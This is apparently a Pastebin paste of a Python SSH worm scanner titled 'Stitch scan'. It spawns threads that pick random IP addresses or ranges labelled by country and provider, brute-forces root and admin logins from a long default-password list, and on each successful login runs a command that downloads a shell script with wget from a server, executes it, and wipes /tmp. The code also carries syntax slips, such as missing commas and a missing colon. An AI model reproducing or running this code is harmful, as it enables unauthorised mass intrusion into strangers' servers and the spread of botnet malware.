API tools faq
paste
Advertisement
Guest User

Stitch scan

a guest
Aug 14th, 2018
3,867
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.20 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. import threading, paramiko, random, socket, time, sys
  4.  
  5. cmd='cd /tmp; rm -rf *; wget -q http://host/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *\r\n'
  6. blacklist = [
  7. '127'
  8. ]
  9. passwords = [
  10. "root:root",
  11. "root:lol",
  12. "root:admin",
  13. "ubnt:ubnt"
  14. "root:1234",
  15. "admin:1234",
  16. "root:toor",
  17. "root:sex",
  18. "root:test",
  19. "pi:pi",
  20. "root:cent6"
  21. "root:admin",
  22. "root:root",
  23. "admin:password",
  24. "ubnt:ubnt"
  25. "root:1234",
  26. "root:123",
  27. "root:12345",
  28. "root:Password",
  29. "root:lol",
  30. "root:toor",
  31. "root:centos7",
  32. "root:qwerty",
  33. "root:centos6",
  34. "root:pussy",
  35. "root:user",
  36. "root:money",
  37. "root:love",
  38. "root:1",
  39. "root:2",
  40. "root:3",
  41. "root:0",
  42. "root:987",
  43. "root:5",
  44. "root:beer",
  45. "root:cia",
  46. "root:fbi",
  47. "root:hack",
  48. "root:bank",
  49. "root:gov",
  50. "root:youtube",
  51. "root:website",
  52. "root:server",
  53. "root:weed",
  54. "root:420",
  55. "root:computer",
  56. "root:linux",
  57. "root:debain",
  58. "root:cent",
  59. "root:vps",
  60. "root:VPS",
  61. "root:light",
  62. "root:cap",
  63. "root:hat",
  64. "root:butt",
  65. "root:but",
  66. "root:name",
  67. "root:god",
  68. "root:work",
  69. "root:job",
  70. "root:bailey",
  71. "root:123456",
  72. "root:michael",
  73. "root:superman",
  74. "root:batman",
  75. "root:starwars",
  76. "root:startrek",
  77. "root:desktop",
  78. "root:windows",
  79. "root:netflix",
  80. "root:shoe",
  81. "root:foot",
  82. "root:tor",
  83. "root:rot",
  84. "root:roots",
  85. "root:root1",
  86. "root:root2",
  87. "root:root3",
  88. "root:root4",
  89. "root:root5",
  90. "root:root6",
  91. "root:root12",
  92. "root:root123",
  93. "root:root1234",
  94. "root:root12345",
  95. "root:root123456",
  96. "root:iphone",
  97. "root:apple",
  98. "root:verizon",
  99. "root:talktalk",
  100. "root:at&t",
  101. "root:strighttalk",
  102. "root:|",
  103. "root:="
  104. "root:abc",
  105. "root:xyz",
  106. "root:abc1",
  107. "root:abc12",
  108. "root:abc123",
  109. "root:abc1234",
  110. "root:abc12345",
  111. "root:abc123456",
  112. "root:sync"
  113. "root:-"
  114. "root:",
  115. "root: ",
  116. "root:a",
  117. "root:z",
  118. "root:python",
  119. "root:perl",
  120. "root:dos",
  121. "root:sql",
  122. "root:database",
  123. "root:minecraft",
  124. "root:minecraft1",
  125. "root:minecraft2",
  126. "root:minecraft3",
  127. "root:minecraft4",
  128. "root:minecraft5",
  129. "root:minecraft6",
  130. "root:minecraft7",
  131. "root:minecraft8",
  132. "root:minecraft9",
  133. "root:minecraft0",
  134. "root:minecraft12",
  135. "root:minecraft123",
  136. "root:minecraft1234",
  137. "root:minecraft12345",
  138. "root:minecraft123456",
  139. "root:minecraft1234567"
  140. "root:minecraft12345678",
  141. "root:minecraft123456789",
  142. "root:minecraft1234567890",
  143. "root:login",
  144. "root:login123",
  145. "root:solo",
  146. "root:passw0rd",
  147. "root:password123",
  148. "root:admins",
  149. "root:cigs",
  150. "root:ruby",
  151. "root:html",
  152. "root:php",
  153. "root:youtuber",
  154. "root:pewdiepiefan",
  155. "root:pewdiepie",
  156. "root:cod",
  157. "root:android",
  158. "root:phone",
  159. "root:pass",
  160. "root:school",
  161. "root:q",
  162. "root:webserver",
  163. "root:college",
  164. "root:keys",
  165. "root:dog",
  166. "root:cat",
  167. "admin:admin",
  168. "admin:admin1",
  169. "admin:admin2",
  170. "admin:admin3",
  171. "admin:admin4",
  172. "admin:admin5",
  173. "admin:admin6",
  174. "admin:admin7",
  175. "admin:admin8",
  176. "admin:admin9",
  177. "admin:admin0",
  178. "admin:admin12",
  179. "admin:admin123",
  180. "admin:admin1234",
  181. "admin:admin12345",
  182. "admin:admin123456"
  183. "admin:admin1234567",
  184. "admin:admin12345678",
  185. "admin:admin123456789",
  186. "admin:admin1234567890",
  187. "admin:admin098",
  188. "admin:admin987",
  189. "admin:admin321",
  190. ]
  191. if sys.argv[4] == '1':
  192. passwords = ["root:root",
  193. "root:admin",
  194. "root:root",
  195. "admin:password",
  196. "ubnt:ubnt"
  197. "root:1234",
  198. "root:123",
  199. "root:12345",
  200. "root:Password",
  201. "root:lol",
  202. "root:toor",
  203. "root:centos7",
  204. "root:qwerty",
  205. "root:centos6",
  206. "root:pussy",
  207. "root:user",
  208. "root:money",
  209. "root:love",
  210. "root:1",
  211. "root:2",
  212. "root:3",
  213. "root:0",
  214. "root:987",
  215. "root:5",
  216. "root:beer",
  217. "root:cia",
  218. "root:fbi",
  219. "root:hack",
  220. "root:bank",
  221. "root:gov",
  222. "root:youtube",
  223. "root:website",
  224. "root:server",
  225. "root:weed",
  226. "root:420",
  227. "root:computer",
  228. "root:linux",
  229. "root:debain",
  230. "root:cent",
  231. "root:vps",
  232. "root:VPS",
  233. "root:light",
  234. "root:cap",
  235. "root:hat",
  236. "root:butt",
  237. "root:but",
  238. "root:name",
  239. "root:god",
  240. "root:work",
  241. "root:job",
  242. "root:bailey",
  243. "root:123456",
  244. "root:michael",
  245. "root:superman",
  246. "root:batman",
  247. "root:starwars",
  248. "root:startrek",
  249. "root:desktop",
  250. "root:windows",
  251. "root:netflix",
  252. "root:shoe",
  253. "root:foot",
  254. "root:tor",
  255. "root:rot",
  256. "root:roots",
  257. "root:root1",
  258. "root:root2",
  259. "root:root3",
  260. "root:root4",
  261. "root:root5",
  262. "root:root6",
  263. "root:root12",
  264. "root:root123",
  265. "root:root1234",
  266. "root:root12345",
  267. "root:root123456",
  268. "root:iphone",
  269. "root:apple",
  270. "root:verizon",
  271. "root:talktalk",
  272. "root:at&t",
  273. "root:strighttalk",
  274. "root:|",
  275. "root:="
  276. "root:abc",
  277. "root:xyz",
  278. "root:abc1",
  279. "root:abc12",
  280. "root:abc123",
  281. "root:abc1234",
  282. "root:abc12345",
  283. "root:abc123456",
  284. "root:sync"
  285. "root:-"
  286. "root:",
  287. "root: ",
  288. "root:a",
  289. "root:z",
  290. "root:python",
  291. "root:perl",
  292. "root:dos",
  293. "root:sql",
  294. "root:database",
  295. "root:minecraft",
  296. "root:minecraft1",
  297. "root:minecraft2",
  298. "root:minecraft3",
  299. "root:minecraft4",
  300. "root:minecraft5",
  301. "root:minecraft6",
  302. "root:minecraft7",
  303. "root:minecraft8",
  304. "root:minecraft9",
  305. "root:minecraft0",
  306. "root:minecraft12",
  307. "root:minecraft123",
  308. "root:minecraft1234",
  309. "root:minecraft12345",
  310. "root:minecraft123456",
  311. "root:minecraft1234567"
  312. "root:minecraft12345678",
  313. "root:minecraft123456789",
  314. "root:minecraft1234567890",
  315. "root:login",
  316. "root:login123",
  317. "root:solo",
  318. "root:passw0rd",
  319. "root:password123",
  320. "root:admins",
  321. "root:cigs",
  322. "root:ruby",
  323. "root:html",
  324. "root:php",
  325. "root:youtuber",
  326. "root:pewdiepiefan",
  327. "root:pewdiepie",
  328. "root:cod",
  329. "root:android",
  330. "root:phone",
  331. "root:pass",
  332. "root:school",
  333. "root:q",
  334. "root:webserver",
  335. "root:college"
  336. "root:keys",
  337. "root:dog",
  338. "root:cat",
  339. "admin:admin",
  340. "admin:admin1",
  341. "admin:admin2",
  342. "admin:admin3",
  343. "admin:admin4",
  344. "admin:admin5",
  345. "admin:admin6",
  346. "admin:admin7",
  347. "admin:admin8",
  348. "admin:admin9",
  349. "admin:admin0",
  350. "admin:admin12",
  351. "admin:admin123",
  352. "admin:admin1234",
  353. "admin:admin12345",
  354. "admin:admin123456"
  355. "admin:admin1234567",
  356. "admin:admin12345678",
  357. "admin:admin123456789",
  358. "admin:admin1234567890",
  359. "admin:admin098",
  360. "admin:admin987",
  361. "admin:admin321",
  362. "root:123",]
  363. ipclassinfo = sys.argv[2]
  364. if ipclassinfo == "A":
  365. ip1 = sys.argv[3]
  366. elif ipclassinfo == "B":
  367. ip1 = sys.argv[3].split(".")[0]
  368. ip2 = sys.argv[3].split(".")[1]
  369. elif ipclassinfo == "C":
  370. ips = sys.argv[3].split(".")
  371. num=0
  372. for ip in ips:
  373. num=num+1
  374. if num == 1:
  375. ip1 = ip
  376. elif num == 2:
  377. ip2 = ip
  378. elif num == 3:
  379. ip3 = ip
  380. class sshscanner(threading.Thread):
  381. global passwords
  382. global ipclassinfo
  383. if ipclassinfo == "A":
  384. global ip1
  385. elif ipclassinfo == "B":
  386. global ip1
  387. global ip2
  388. elif ipclassinfo == "C":
  389. global ip1
  390. global ip2
  391. global ip3
  392. def run(self):
  393. while 1:
  394. try:
  395. while 1:
  396. thisipisbad='no'
  397. if ipclassinfo == "A":
  398. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  399. elif ipclassinfo == "B":
  400. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  401. elif ipclassinfo == "C":
  402. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  403. elif ipclassinfo == "USA":
  404. usa = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  405. self.host = random.choice(usa)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  406. elif ipclassinfo == "Russia":
  407. russia = ["122","131","161","37","186","187","31","188","201","2","200"]
  408. self.host = random.choice(russia)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  409. elif ipclassinfo == "LSD":
  410. lsd = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
  411. self.host = random.choice(lsd)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  412. elif ipclassinfo == "Shrooms":
  413. shrooms = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
  414. self.host = random.choice(shrooms)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  415. elif ipclassinfo == "stitch":
  416. xanax = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"]
  417. self.host = random.choice(xanax)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  418. elif ipclassinfo == "Cisco":
  419. cisco = ["1"]
  420. self.host = random.choice(cisco)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  421. elif ipclassinfo == "Busybox":
  422. busybox = ["199.180","142.0","158.69"]
  423. self.host = random.choice(busybox)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  424. elif ipclassinfo == "WholeSale":
  425. wholesale = ["208.67"]
  426. self.host = random.choice(wholesale)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  427. elif ipclassinfo == "ECATEL":
  428. ecatel = ["89.248"]
  429. self.host = random.choice(ecatel)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  430. elif ipclassinfo == "CHINA":
  431. china = ["65.19","220.248"]
  432. self.host = random.choice(china)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  433. elif ipclassinfo == "INDIA":
  434. india = ["1.6","1.7","1.22","1.23"]
  435. self.host = random.choice(india)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  436. elif ipclassinfo == "CDN":
  437. cdn = ["217.106","217.106"]
  438. self.host = random.choice(cdn)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  439. elif ipclassinfo == "AWS"
  440. aws = ["23.20","27.0","27.22","43.250","46.0","47.0","50.15","51.0","52.0","52.100"]
  441. self.host = random.choice(aws)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  442. elif ipclassinfo == "Random":
  443. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  444. else:
  445. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  446. for badip in blacklist:
  447. if badip in self.host:
  448. thisipisbad='yes'
  449. if thisipisbad=='no':
  450. break
  451. username='root'
  452. password=""
  453. port = 22
  454. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  455. s.settimeout(3)
  456. s.connect((self.host, port))
  457. s.close()
  458. ssh = paramiko.SSHClient()
  459. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  460. dobreak=False
  461. for passwd in passwords:
  462. if ":n/a" in passwd:
  463. password=""
  464. else:
  465. password=passwd.split(":")[1]
  466. if "n/a:" in passwd:
  467. username=""
  468. else:
  469. username=passwd.split(":")[0]
  470. try:
  471. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  472. dobreak=True
  473. break
  474. except:
  475. pass
  476. if True == dobreak:
  477. break
  478. badserver=True
  479. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  480. output = stdout.read()
  481. if "inet addr" in output:
  482. badserver=False
  483. if badserver == False:
  484. print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)
  485. ssh.exec_command(""+cmd+"")
  486. time.sleep(20)
  487. ssh.close()
  488. except:
  489. pass
  490.  
  491. for x in range(0,int(sys.argv[1])):
  492. try:
  493. t = sshscanner()
  494. t.start()
  495. except:
  496. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!